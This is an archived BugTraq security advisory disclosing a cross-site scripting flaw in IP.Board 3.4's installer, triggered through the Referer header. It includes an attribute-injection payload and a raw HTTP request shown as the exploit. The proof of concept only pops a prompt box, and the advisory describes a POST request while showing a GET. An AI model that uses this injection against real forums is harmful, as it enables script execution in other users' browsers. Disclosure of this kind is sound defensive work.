BugTraq
IP.Board 3.4 cross-site scripting in Referer header Jul 16 2014 09:26PM
stormhacker hotmail com
+--------------------------------------------------------------------
+
+ IP.Board 3.4 cross-site scripting in Referer header
+
+--------------------------------------------------------------------
+ vendor site........: http://www.invisionpower.com
+ Affected Software .: IP.Board 3.4
+ Class .............: XSS
+ Risk ..............: high
+ Found by ..........: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ]
+ Facebook .: https://www.facebook.com/runvirus
+ Contact ...........: stormhacker[at]hotmail[.]com
+--------------------------------------------------------------------

[X] Affected Products:
=========================
test on IP.Board 3.4.6 & IP.Board 3.4.4

maybe work under 3.4

[X] About the application:
=========================

IP.Board is the leading solution for creating an engaging discussion forum on the web.

[X] Vulnerability Description:
===============================
The attack is going with above-mentioned conditions. It's needed to send

POST request to http://path_forum/admin/install/index.php

with setting of Referer header.

Referer: 1" onmouseover=prompt(947671) bad="

[X] Exploit :
===============================

GET /admin/install/index.php HTTP/1.1
Referer: 1" onmouseover=prompt(11111111) bad="
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie:
Host: localhost/admin/install/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

[X] Video proof :
===============================
https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be

+--------------------------------------------------------------------
+
+ Greets:
+ || rUnViRuS || - || Providor ||
+-------------------------[ W D T ]----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus